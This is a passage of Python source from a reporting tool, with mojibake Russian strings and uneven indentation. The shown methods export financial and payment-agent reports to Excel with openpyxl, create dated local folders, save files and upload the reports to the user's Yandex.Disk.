                                self.itog_report_month[tariff][0]
                            self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] += \
                                self.itog_report_month[tariff][1]
            except KeyError:
                # tariff missing from itog_report_month — skip it
                pass
            except TypeError:
                # non-numeric row (e.g. dates) — skip it
                pass
    # final consistency check: report total vs accumulated control sum
    if self.agentreport_dict_month['ะะขะะะ'][''][1][2] != \
            self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2] or \
            self.agentreport_dict_month['ะะขะะะ'][''][1][1] != \
            self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1]:
        self.show_dialog("ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
 ััะผะผ.",
                         f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.agentreport_dict_month['ะะขะะะ'][''][1][1]}: "
                         f"{self.agentreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
                         f"({self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1]}: "
                         f"{self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2]})"
                         )
        logging.error(f"{__name__}: {str(datetime.now())[:-7]}: ะะตัะพะพัะฒะตัััะฒะธะต ะะพะฝััะพะปัะฝัั
 ััะผะผ. "
                      f"ะัะพะณะพ ะฟะพ ะพััะตัั ({self.agentreport_dict_month['ะะขะะะ'][''][1][1]}: "
                      f"{self.agentreport_dict_month['ะะขะะะ'][''][1][2]}) ะฝะต ัะฐะฒะฝะพ ะะพะฝััะพะปัะฝะพะน ััะผะผะต ััะปัะณ"
                      f"({self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][1]}: "
                      f"{self.agentreport_dict_month['ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ']['Cัะผะผะฐ'][0][2]})")
def export_fin_report(self):
"""
ะกะพั
ัะฐะฝัะตั ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั ะฒ ะฒะธะดะต Excel-ัะฐะนะปะฐ ะฒ ะปะพะบะฐะปัะฝัั ะดะธัะตะบัะพัะธั
"""
# ะพะฟัะตะดะตะปัะตะผ ััะธะปะธ
h1 = Font(name='Times New Roman',
size=18,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font = Font(name='Times New Roman',
size=9,
bold=False,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
font_bold = Font(name='Times New Roman',
size=9,
bold=True,
italic=False,
vertAlign=None,
underline='none',
strike=False,
color='FF000000')
fill = PatternFill(fill_type='solid',
start_color='c1c1c1',
end_color='c2c2c2')
table_color = PatternFill(fill_type='solid',
start_color='e2e2e2',
end_color='e9e9e9')
align_top = Alignment(horizontal='general',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
align_top_center = Alignment(horizontal='center',
vertical='top',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0,
)
border = Border(left=Side(border_style='thin',
color='FF000000'),
right=Side(border_style='thin',
color='FF000000'),
top=Side(border_style='thin',
color='FF000000'),
bottom=Side(border_style='thin',
color='FF000000'),
diagonal=Side(border_style='thin',
color='FF000000'),
diagonal_direction=0,
outline=Side(border_style='thin',
color='FF000000'),
vertical=Side(border_style='thin',
color='FF000000'),
horizontal=Side(border_style='thin',
color='FF000000')
)
align_left = Alignment(horizontal='left',
vertical='bottom',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
number_format = 'General'
protection = Protection(locked=True,
hidden=False)
column = ['', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
self.row = '0'
def next_row():
self.row = str(int(self.row) + 1)
return self.row
# ะพะฑัะตะบั
wb = Workbook()
# ะฐะบัะธะฒะฝัะน ะปะธัั
ws = wb.active
# ะฝะฐะทะฒะฐะฝะธะต ัััะฐะฝะธัั
# ws = wb.create_sheet('ะฟะตัะฒะฐั ัััะฐะฝะธัะฐ', 0)
ws.title = 'ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั'
# ััะธััั
ws['A1'].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws['A1'].alignment = align_left
# ะจะธัะธะฝะฐ ัััะพะปะฑัะพะฒ
ws.column_dimensions['A'].width = 1 / 7 * 67
ws.column_dimensions['B'].width = 1 / 7 * 95
ws.column_dimensions['C'].width = 1 / 7 * 87
ws.column_dimensions['D'].width = 1 / 7 * 87
ws.column_dimensions['E'].width = 1 / 7 * 47
ws.column_dimensions['F'].width = 1 / 7 * 87
ws.column_dimensions['G'].width = 1 / 7 * 87
ws.column_dimensions['H'].width = 1 / 7 * 47
ws.column_dimensions['I'].width = 1 / 7 * 87
ws.column_dimensions['J'].width = 1 / 7 * 87
ws.column_dimensions['K'].width = 1 / 7 * 47
ws.column_dimensions['L'].width = 1 / 7 * 87
ws.column_dimensions['M'].width = 1 / 7 * 87
ws.column_dimensions['N'].width = 1 / 7 * 47
ws.column_dimensions['O'].width = 1 / 7 * 87
ws.column_dimensions['P'].width = 1 / 7 * 87
ws.column_dimensions['Q'].width = 1 / 7 * 47
ws.column_dimensions['R'].width = 1 / 7 * 87
ws.column_dimensions['S'].width = 1 / 7 * 87
ws.column_dimensions['T'].width = 1 / 7 * 47
ws.column_dimensions['U'].width = 1 / 7 * 87
ws.column_dimensions['V'].width = 1 / 7 * 47
ws.column_dimensions['W'].width = 1 / 7 * 87
ws.column_dimensions['X'].width = 1 / 7 * 87
ws.column_dimensions['Y'].width = 1 / 7 * 87
ws.column_dimensions['Z'].width = 1 / 7 * 87
# ะทะฝะฐัะตะฝะธะต ััะตะนะบะธ
# ws['A1'] = "Hello!"
ws[column[1] + next_row()] = 'ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั'
ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
# ััะธััั
ws[column[1] + self.row].font = h1
# ะฒััะฐะฒะฝะธะฒะฐะฝะธะต
ws[column[1] + self.row].alignment = align_left
# ะััะพัะฐ ัััะพะบ
ws.row_dimensions[1].height = 24
ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
ws[column[1] + self.row].font = font
ws[column[1] + self.row].alignment = align_top
ws[column[2] + self.row] = (self.finreport_dict["ะะฐัะฐ"][0]).strftime("%d.%m.%Y")
ws[column[2] + self.row].font = font_bold
ws[column[2] + self.row].alignment = align_top
ws[column[3] + self.row] = 'ะฟะพ'
ws[column[3] + self.row].font = font
ws[column[3] + self.row].alignment = align_top
ws[column[4] + self.row] = (self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1)).strftime("%d.%m.%Y")
ws[column[4] + self.row].font = font_bold
ws[column[4] + self.row].alignment = align_top
# ะขะะะะะฆะ
self.color = False
def merge_table():
# ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=4)
for b in range(1, 27):
ws[column[b] + self.row].font = font
ws[column[b] + self.row].alignment = align_top
if b not in (1, 2, 5, 8, 11, 14, 17, 20, 22):
ws[column[b] + self.row].number_format = '#,##0.00 โฝ'
ws[column[b] + self.row].border = border
if self.color:
b = 1
while b < len(column):
ws[column[b] + self.row].fill = table_color
b += 1
self.color = False
else:
self.color = True
ws[column[1] + next_row()] = 'ะะฐัะฐ'
ws.merge_cells(start_row=self.row, start_column=1, end_row=str(int(self.row) + 1), end_column=1)
ws[column[2] + self.row] = 'ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'
ws.merge_cells(start_row=self.row, start_column=2, end_row=str(int(self.row) + 1), end_column=2)
ws[column[3] + self.row] = 'ะะฑัะฐั ััะผะผะฐ'
ws.merge_cells(start_row=self.row, start_column=3, end_row=str(int(self.row) + 1), end_column=3)
ws[column[4] + self.row] = 'ะกัะผะผะฐ KPI'
ws.merge_cells(start_row=self.row, start_column=4, end_row=str(int(self.row) + 1), end_column=4)
ws[column[5] + self.row] = 'ะะธะปะตัั'
ws.merge_cells(start_row=self.row, start_column=5, end_row=self.row, end_column=7)
ws[column[8] + self.row] = 'ะะธะปะตัั ะะะ ะ'
ws.merge_cells(start_row=self.row, start_column=8, end_row=self.row, end_column=10)
ws[column[11] + self.row] = 'ะขะตัะผะพะทะพะฝะฐ'
ws.merge_cells(start_row=self.row, start_column=11, end_row=self.row, end_column=13)
ws[column[14] + self.row] = 'ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'
ws.merge_cells(start_row=self.row, start_column=14, end_row=self.row, end_column=16)
ws[column[17] + self.row] = 'ะะฑัะตะฟะธั'
ws.merge_cells(start_row=self.row, start_column=17, end_row=self.row, end_column=19)
ws[column[20] + self.row] = 'ะัะพัะตะต'
ws.merge_cells(start_row=self.row, start_column=20, end_row=self.row, end_column=21)
ws[column[22] + self.row] = 'Online ะัะพะดะฐะถะธ'
ws.merge_cells(start_row=self.row, start_column=22, end_row=self.row, end_column=24)
ws[column[25] + self.row] = 'ะกัะผะผะฐ ะฑะตะทะฝะฐะป'
ws.merge_cells(start_row=self.row, start_column=25, end_row=str(int(self.row) + 1), end_column=25)
ws[column[26] + self.row] = 'ะกัะผะผะฐ Biglion'
ws.merge_cells(start_row=self.row, start_column=26, end_row=str(int(self.row) + 1), end_column=26)
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
for b in range(1, 27):
ws[column[b] + self.row].font = font
ws[column[b] + self.row].alignment = align_top_center
ws[column[b] + self.row].border = border
ws[column[5] + next_row()] = 'ะะพะป-ะฒะพ'
ws[column[6] + self.row] = 'ะกัะผะผะฐ'
ws[column[7] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[8] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[9] + self.row] = 'ะกัะผะผะฐ'
ws[column[10] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[11] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[12] + self.row] = 'ะกัะผะผะฐ'
ws[column[13] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[14] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[15] + self.row] = 'ะกัะผะผะฐ'
ws[column[16] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[17] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[18] + self.row] = 'ะกัะผะผะฐ'
ws[column[19] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
ws[column[20] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[21] + self.row] = 'ะกัะผะผะฐ'
ws[column[22] + self.row] = 'ะะพะป-ะฒะพ'
ws[column[23] + self.row] = 'ะกัะผะผะฐ'
ws[column[24] + self.row] = 'ะกัะตะดะฝะธะน ัะตะบ'
# ัะฐัะบัะฒัะธะฒะฐะฝะธะต ัะพะฝะฐ ะดะปั ะทะฐะณะพะปะพะฒะบะพะฒ
b = 1
while b < len(column):
ws[column[b] + self.row].fill = fill
b += 1
for b in range(1, 27):
ws[column[b] + self.row].font = font
ws[column[b] + self.row].alignment = align_top_center
ws[column[b] + self.row].border = border
if self.finreport_dict['ะะฐัะฐ'][0] == self.finreport_dict['ะะฐัะฐ'][1] - timedelta(1):
date_ = datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1), "%Y-%m-%d")}'
ws[column[1] + next_row()] = date_
ws[column[2] + self.row] = self.finreport_dict['ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ'][0]
ws[column[3] + self.row] = self.finreport_dict['ะะขะะะ'][1]
ws[column[4] + self.row] = f'=C{self.row}-U{self.row}+W{self.row}+Y{self.row}+Z{self.row}'
ws[column[5] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][0]
ws[column[6] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ'][1]
ws[column[7] + self.row] = f'=ะะกะะะะจะะะะ(F{self.row}/E{self.row},0)'
ws[column[8] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][0]
ws[column[9] + self.row] = self.finreport_dict['ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ'][0]
ws[column[10] + self.row] = f'=ะะกะะะะจะะะะ(I{self.row}/H{self.row},0)'
ws[column[11] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][0]
ws[column[12] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ'][1]
ws[column[13] + self.row] = f'=ะะกะะะะจะะะะ(L{self.row}/K{self.row},0)'
ws[column[14] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][0]
ws[column[15] + self.row] = self.finreport_dict['ะขะตัะผะพะทะพะฝะฐ ะะะ ะ'][1]
ws[column[16] + self.row] = f'=ะะกะะะะจะะะะ(O{self.row}/N{self.row},0)'
ws[column[17] + self.row] = self.finreport_dict['ะะฑัะตะฟะธั'][0]
ws[column[18] + self.row] = self.finreport_dict['ะะฑัะตะฟะธั'][1]
ws[column[19] + self.row] = f'=ะะกะะะะจะะะะ(R{self.row}/Q{self.row},0)'
ws[column[20] + self.row] = self.finreport_dict['ะัะพัะตะต'][0]
ws[column[21] + self.row] = self.finreport_dict['ะัะพัะตะต'][1]
ws[column[22] + self.row] = self.finreport_dict['Online ะัะพะดะฐะถะธ'][0]
ws[column[23] + self.row] = self.finreport_dict['Online ะัะพะดะฐะถะธ'][1]
ws[column[24] + self.row] = f'=ะะกะะะะจะะะะ(W{self.row}/V{self.row},0)'
ws[column[25] + self.row] = 0
ws[column[26] + self.row] = 0
merge_table()
# ัะฒะตะปะธัะธะฒะฐะตะผ ะฒัะต ัััะพะบะธ ะฟะพ ะฒััะพัะต
max_row = ws.max_row
i = 2
while i <= max_row:
rd = ws.row_dimensions[i]
rd.height = 18
i += 1
if self.finreport_dict['ะะฐัะฐ'][0] == self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1):
date_ = datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")
else:
date_ = f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][1], "%Y-%m-%d")}'
path = self.local_folder + self.path + date_ + f' ะคะธะฝะฐะฝัะพะฒัะน ะพััะตั' + ".xlsx"
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ัะธะฝะฐะฝัะพะฒะพะณะพ ะพััะตัะฐ ะฒ {path}')
path = self.create_path(path)
self.save_file(path, wb)
return path
def export_agent_report(self, agentreport_dict):
    """
    Save a payment-agent report as an Excel file in the local directory
    tree and return the path of the written file.

    :param agentreport_dict: report mapping as built by ``agent_report``;
        must contain 'ะัะณะฐะฝะธะทะฐัะธั', 'ะะฐัะฐ' and 'ะะขะะะ' entries plus one
        [count, sum] pair per provider line
    :return: str — local path of the saved .xlsx file
    """
    # --- cell styles -------------------------------------------------------
    h1 = Font(name='Times New Roman',
              size=18,
              bold=True,
              italic=False,
              vertAlign=None,
              underline='none',
              strike=False,
              color='FF000000')
    font = Font(name='Times New Roman',
                size=9,
                bold=False,
                italic=False,
                vertAlign=None,
                underline='none',
                strike=False,
                color='FF000000')
    font_bold = Font(name='Times New Roman',
                     size=9,
                     bold=True,
                     italic=False,
                     vertAlign=None,
                     underline='none',
                     strike=False,
                     color='FF000000')
    fill = PatternFill(fill_type='solid',
                       start_color='c1c1c1',
                       end_color='c2c2c2')
    table_color = PatternFill(fill_type='solid',
                              start_color='e2e2e2',
                              end_color='e9e9e9')
    align_top = Alignment(horizontal='general',
                          vertical='top',
                          text_rotation=0,
                          wrap_text=False,
                          shrink_to_fit=False,
                          indent=0,
                          )
    border = Border(left=Side(border_style='thin',
                              color='FF000000'),
                    right=Side(border_style='thin',
                               color='FF000000'),
                    top=Side(border_style='thin',
                             color='FF000000'),
                    bottom=Side(border_style='thin',
                                color='FF000000'),
                    diagonal=Side(border_style='thin',
                                  color='FF000000'),
                    diagonal_direction=0,
                    outline=Side(border_style='thin',
                                 color='FF000000'),
                    vertical=Side(border_style='thin',
                                  color='FF000000'),
                    horizontal=Side(border_style='thin',
                                    color='FF000000')
                    )
    align_left = Alignment(horizontal='left',
                           vertical='bottom',
                           text_rotation=0,
                           wrap_text=False,
                           shrink_to_fit=False,
                           indent=0)
    number_format = 'General'
    protection = Protection(locked=True,
                            hidden=False)
    # Index 0 is a placeholder so column letters are 1-based.
    column = ['', 'A', 'B', 'C', 'D', 'E']
    # Rows are tracked as strings: concatenated with a column letter they
    # form cell coordinates like 'A3'.
    self.row = '0'

    def next_row():
        # Advance the shared row cursor and return it.
        self.row = str(int(self.row) + 1)
        return self.row

    wb = Workbook()
    ws = wb.active
    ws.title = 'ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ'
    ws['A1'].font = h1
    ws['A1'].alignment = align_left
    # Column widths (openpyxl width units ≈ 1/7 of a pixel count).
    ws.column_dimensions['A'].width = 1 / 7 * 124
    ws.column_dimensions['B'].width = 1 / 7 * 80
    ws.column_dimensions['C'].width = 1 / 7 * 24
    ws.column_dimensions['D'].width = 1 / 7 * 175
    ws.column_dimensions['E'].width = 1 / 7 * 200
    # --- title, organisation and period lines ------------------------------
    ws[column[1] + next_row()] = 'ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ ะฟะพ ะฟัะธะตะผั ะดะตะฝะตะถะฝัั
 ััะตะดััะฒ'
    ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column)-1)
    ws[column[1] + self.row].font = h1
    ws[column[1] + self.row].alignment = align_left
    ws.row_dimensions[1].height = 24
    ws[column[1] + next_row()] = f'{agentreport_dict["ะัะณะฐะฝะธะทะฐัะธั"][1]}'
    ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=len(column) - 1)
    ws[column[1] + self.row].font = font
    ws[column[1] + self.row].alignment = align_top
    ws[column[1] + next_row()] = 'ะะฐ ะฟะตัะธะพะด ั:'
    ws[column[1] + self.row].font = font
    ws[column[1] + self.row].alignment = align_top
    ws[column[2] + self.row] = (agentreport_dict["ะะฐัะฐ"][0]).strftime("%d.%m.%Y")
    ws[column[2] + self.row].font = font_bold
    ws[column[2] + self.row].alignment = align_top
    ws[column[3] + self.row] = 'ะฟะพ'
    ws[column[3] + self.row].font = font
    ws[column[3] + self.row].alignment = align_top
    # The stored end date is exclusive — display the last included day.
    ws[column[4] + self.row] = (agentreport_dict["ะะฐัะฐ"][1] - timedelta(1)).strftime("%d.%m.%Y")
    ws[column[4] + self.row].font = font_bold
    ws[column[4] + self.row].alignment = align_top
    # --- table -------------------------------------------------------------
    self.color = False

    def merge_table():
        # Style a regular data row (name spans A:D, sum in E) and
        # alternate the background via self.color.
        ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=4)
        ws[column[1] + self.row].font = font
        ws[column[5] + self.row].font = font
        ws[column[1] + self.row].alignment = align_top
        ws[column[5] + self.row].alignment = align_top
        ws[column[5] + self.row].number_format = '#,##0.00 โฝ'
        b = 1
        while b < len(column):
            ws[column[b] + self.row].border = border
            b += 1
        if self.color:
            b = 1
            while b < len(column):
                ws[column[b] + self.row].fill = table_color
                b += 1
            self.color = False
        else:
            self.color = True

    def merge_table_bold():
        # Style a header/total row in bold, without background striping.
        ws.merge_cells(start_row=self.row, start_column=1, end_row=self.row, end_column=4)
        ws[column[1] + self.row].font = font_bold
        ws[column[5] + self.row].font = font_bold
        ws[column[1] + self.row].alignment = align_top
        ws[column[5] + self.row].alignment = align_top
        b = 1
        while b < len(column):
            ws[column[b] + self.row].border = border
            b += 1

    ws[column[1] + next_row()] = 'ะะฐะธะผะตะฝะพะฒะฐะฝะธะต ะฟะพััะฐะฒัะธะบะฐ ััะปัะณ'
    ws[column[5] + self.row] = 'ะกัะผะผะฐ'
    merge_table_bold()
    # Header background.
    b = 1
    while b < len(column):
        ws[column[b] + self.row].fill = fill
        b += 1
    # One row per provider line; 'ะัะณะฐะฝะธะทะฐัะธั', 'ะะฐัะฐ' and 'ะะขะะะ' are
    # meta entries and are excluded from both output and the total.
    itog_sum = 0
    for line in agentreport_dict:
        if line != 'ะัะณะฐะฝะธะทะฐัะธั' and line != 'ะะฐัะฐ' and line != 'ะะขะะะ':
            try:
                itog_sum += agentreport_dict[line][1]
                ws[column[1] + next_row()] = line
                ws[column[5] + self.row] = agentreport_dict[line][1]
                merge_table()
            except AttributeError:
                pass
    ws[column[1] + next_row()] = 'ะัะพะณะพ'
    # Consistency check: the sum of the emitted rows must equal 'ะะขะะะ'.
    if itog_sum != agentreport_dict['ะะขะะะ'][1]:
        logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ. ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ: ััะผะผะฐ ัััะพะบ '
                      f'({itog_sum}) ะฝะต ัะฐะฒะฝะฐ ัััะพะบะต ะะขะะะ '
                      f'({agentreport_dict["ะะขะะะ"][1]})')
        self.show_dialog(f'ะัะธะฑะบะฐ. ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ', f'ะัะธะฑะบะฐ. ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ: ััะผะผะฐ ัััะพะบ '
                         f'({itog_sum}) ะฝะต ัะฐะฒะฝะฐ ัััะพะบะต ะะขะะะ '
                         f'({agentreport_dict["ะะขะะะ"][1]})')
    ws[column[5] + self.row] = itog_sum
    ws[column[5] + self.row].number_format = '#,##0.00 โฝ'
    merge_table_bold()
    # Raise all row heights for readability.
    max_row = ws.max_row
    i = 2
    while i <= max_row:
        rd = ws.row_dimensions[i]
        rd.height = 18
        i += 1
    # --- save --------------------------------------------------------------
    if agentreport_dict['ะะฐัะฐ'][0] == agentreport_dict["ะะฐัะฐ"][1] - timedelta(1):
        date_ = datetime.strftime(agentreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")
    else:
        date_ = f'{datetime.strftime(agentreport_dict["ะะฐัะฐ"][0], "%Y-%m-%d")} - ' \
                f'{datetime.strftime(agentreport_dict["ะะฐัะฐ"][1], "%Y-%m-%d")}'
    path = self.local_folder + self.path + date_ + f' ะััะตั ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ {agentreport_dict["ะัะณะฐะฝะธะทะฐัะธั"][1]}' + ".xlsx"
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพั
ัะฐะฝะตะฝะธะต ะพััะตัะฐ ะฟะปะฐัะตะถะฝะพะณะพ ะฐะณะตะฝัะฐ '
                 f'{agentreport_dict["ะัะณะฐะฝะธะทะฐัะธั"][1]} ะฒ {path}')
    path = self.create_path(path)
    self.save_file(path, wb)
    return path
def create_path(self, path):
"""
ะัะพะฒะตััะตั ะฝะฐะปะธัะธะต ัะบะฐะทะฐะฝะฝะพะณะพ ะฟััะธ. ะ ัะปััะฐะต ะพััััััะฒะธั ะบะฐะบะธั
-ะปะธะฑะพ ะฟะฐะฟะพะบ ัะพะทะดะฐะตั ะธั
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะพะฒะตัะบะฐ ะปะพะบะฐะปัะฝัั
ะฟััะตะน ัะพั
ัะฐะฝะตะฝะธั ัะฐะนะปะพะฒ...')
list_path = path.split('/')
path = ''
end_path = ''
if list_path[-1][-4:] == '.xls' or list_path[-1]:
end_path = list_path.pop()
list_path.append(self.date_from.strftime('%Y'))
list_path.append(self.date_from.strftime('%m') + '-' + self.date_from.strftime('%B'))
directory = os.getcwd()
for folder in list_path:
if folder not in os.listdir():
os.mkdir(folder)
logging.warning(f'{__name__}: {str(datetime.now())[:-7]}: ะ ะดะธัะตะบัะพัะธะธ "{os.getcwd()}" ัะพะทะดะฐะฝะฐ ะฟะฐะฟะบะฐ "{folder}"')
os.chdir(folder)
else:
os.chdir(folder)
path += folder + '/'
path += end_path
os.chdir(directory)
return path
def save_file(self, path, file):
    """
    Write *file* (any object exposing ``save(path)``, e.g. an openpyxl
    workbook) to *path*.

    If the target file is locked by another process (PermissionError),
    log the failure and show a dialog that retries this very method once
    the user closes the message.
    """
    try:
        file.save(path)
    except PermissionError as err:
        busy_msg = f'ะคะฐะนะป "{path}" ะทะฐะฝัั ะดััะณะธะผ ะฟัะพัะตััะพะผ.'
        logging.error(f'{__name__}: {str(datetime.now())[:-7]}: {busy_msg}\n{repr(err)}')
        # The dialog carries this method plus its arguments so the save
        # can be re-attempted after the user releases the file.
        self.show_dialog(
            f'ะัะธะฑะบะฐ ะทะฐะฟะธัะธ ัะฐะนะปะฐ',
            busy_msg + '\nะะปั ะฟะพะฒัะพัะฐ ะฟะพะฟััะบะธ ะทะฐะบัะพะนัะต ััะพ ัะพะพะฑัะตะฝะธะต',
            func=self.save_file, path=path, file=file,
        )
def sync_to_yadisk(self, path_list, token):
    """
    Copy the locally saved report files to Yandex.Disk.

    :param path_list: local paths of report files to upload; an empty
        list means there is nothing to send.
    :param token: OAuth token for the Yandex.Disk REST API.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฟะธัะพะฒะฐะฝะธะต ะพััะตัะพะฒ ะฒ ะฏะฝะดะตะบั.ะะธัะบ...')
    if path_list:
        # Uploading can be switched off entirely via configuration.
        if self.use_yadisk:
            logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะตะดะธะฝะตะฝะธะต ั YaDisk...')
            self.yadisk = yadisk.YaDisk(token=token)
            if self.yadisk.check_token():
                path = '' + self.path
                # Make sure the remote year/month folder tree exists and get
                # the folder (ending in '/') the files should land in.
                remote_folder = self.create_path_yadisk(path)
                for local_path in path_list:
                    remote_path = remote_folder + local_path.split('/')[-1]
                    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฟัะฐะฒะบะฐ ัะฐะนะปะฐ "{local_path.split("/")[-1]}" ะฒ YaDisk...')
                    # Collect full remote paths of the files already present in
                    # the target folder (entries with key['file'] truthy are files).
                    files_list_yandex = list(self.yadisk.listdir(remote_folder))
                    files_list = []
                    for key in files_list_yandex:
                        if key['file']:
                            files_list.append(remote_folder + key['name'])
                    # A same-named remote file is deleted first, so the upload
                    # replaces it instead of failing on a name collision.
                    if remote_path in files_list:
                        logging.warning(
                            f'{__name__}: {str(datetime.now())[:-7]}: '
                            f'ะคะฐะนะป "{local_path.split("/")[-1]}" ัะถะต ัััะตััะฒัะตั ะฒ "{remote_folder}" ะธ ะฑัะดะตั ะทะฐะผะตะฝะตะฝ!')
                        self.yadisk.remove(remote_path, permanently=True)
                    self.yadisk.upload(local_path, remote_path)
                    logging.info(
                        f'{__name__}: {str(datetime.now())[:-7]}: '
                        f'ะคะฐะนะป "{local_path.split("/")[-1]}" ะพัะฟัะฐะฒะปะตะฝ ะฒ "{remote_folder}" YaDisk...')
            else:
                # Invalid token: keep the local copies and tell the user.
                logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ YaDisk: token ะฝะต ะฒะฐะปะธะดะตะฝ')
                self.show_dialog('ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั ั Yandex.Disc',
                                 f'\nะััะตัั ัะพั…ัะฐะฝะตะฝั ะฒ ะฟะฐะฟะบะต {self.local_folder} '
                                 f'ะธ ะฝะต ะฑัะดัั ะพัะฟัะฐะฒะปะตะฝั ะฝะฐ Yandex.Disc.')
    else:
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะตั ะฝะธ ะพะดะฝะพะณะพ ะพััะตัะฐ ะดะปั ะพัะฟัะฐะฒะบะธ ะฒ Yandex.Disk')
def create_path_yadisk(self, path):
    """
    Check that the given path exists on Yandex.Disk, creating any
    missing folders along the way.

    :param path: slash-separated remote path; a trailing ``*.xls`` file
        name or the empty component left by a trailing slash is stripped
        before the reporting period folders
        (``<year>/<month number>-<month name>``) are appended.
    :return: the deepest remote folder path, ending with '/'.
    """
    logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะพะฒะตัะบะฐ ะฟััะตะน ัะพั…ัะฐะฝะตะฝะธั ัะฐะนะปะพะฒ ะฝะฐ ะฏะฝะดะตะบั.ะะธัะบะต...')
    list_path = path.split('/')
    path = ''
    end_path = ''
    # Detach the last component when it is a file name or the empty
    # string produced by a trailing slash.
    # NOTE(review): end_path is collected but never re-attached in this
    # method (unlike the local create_path) — confirm this is intended.
    if list_path[-1][-4:] == '.xls' or list_path[-1] == '':
        end_path = list_path.pop()
    # Append the reporting period folders derived from the report start date.
    list_path.append(self.date_from.strftime('%Y'))
